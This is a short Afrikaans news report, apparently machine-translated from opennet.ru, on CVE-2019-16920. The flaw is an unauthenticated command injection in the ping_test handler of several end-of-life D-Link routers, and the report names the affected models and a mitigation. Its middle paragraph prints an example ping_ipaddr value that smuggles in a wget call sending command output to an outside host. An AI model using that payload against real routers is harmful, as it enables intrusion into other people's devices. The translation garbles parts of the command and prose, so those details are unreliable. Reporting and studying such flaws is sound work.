Kwesbaarheid wat op afstand kan ontgin in D-Link-roeteerders

In D-Link draadlose routers geïdentifiseer gevaarlike kwesbaarheid (CVE-2019–16920), wat jou toelaat om kode op 'n afstand uit te voer aan die toestelkant deur 'n spesiale versoek aan die "ping_test"-hanteerder te stuur, toeganklik sonder verifikasie.

Interessant genoeg, volgens die firmware-ontwikkelaars, moet die "ping_test"-oproep eers na verifikasie uitgevoer word, maar in werklikheid word dit in elk geval genoem, ongeag of jy by die webkoppelvlak aanteken. In die besonder, wanneer toegang tot die application_sec.cgi-skrip verkry word en die “action=ping_test”-parameter deurgegee word, herlei die script na die verifikasiebladsy, maar voer terselfdertyd die aksie uit wat met ping_test geassosieer word. Om die kode uit te voer, is 'n ander kwesbaarheid in ping_test self gebruik, wat die ping-nutsding oproep sonder om die korrektheid van die IP-adres wat vir toetsing gestuur is, behoorlik na te gaan. Byvoorbeeld, om die wget-hulpprogram te bel en die resultate van die "echo 1234"-opdrag na 'n eksterne gasheer oor te dra, spesifiseer net die parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( eggo 1234)".

Kwesbaarheid wat op afstand kan ontgin in D-Link-roeteerders

Die teenwoordigheid van die kwesbaarheid is amptelik in die volgende modelle bevestig:

  • DIR-655 met firmware 3.02b05 of ouer;
  • DIR-866L met firmware 1.03b04 of ouer;
  • DIR-1565 met firmware 1.01 of ouer;
  • DIR-652 (geen inligting oor problematiese firmwareweergawes word verskaf nie)

Die ondersteuningstydperk vir hierdie modelle het reeds verstryk, dus D-Link hy het gesê, wat nie opdaterings vir hulle sal vrystel om die kwesbaarheid uit te skakel nie, beveel nie aan om dit te gebruik nie en beveel aan om dit met nuwe toestelle te vervang. As 'n veiligheidsoplossing kan u toegang tot die webkoppelvlak beperk tot slegs vertroude IP-adresse.

Dit is later ontdek dat die kwesbaarheid ook was affekteer modelle DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 en DIR-825, planne vir die vrystelling van opdaterings waarvoor nog nie bekend is nie.

Bron: opennet.ru

Voeg 'n opmerking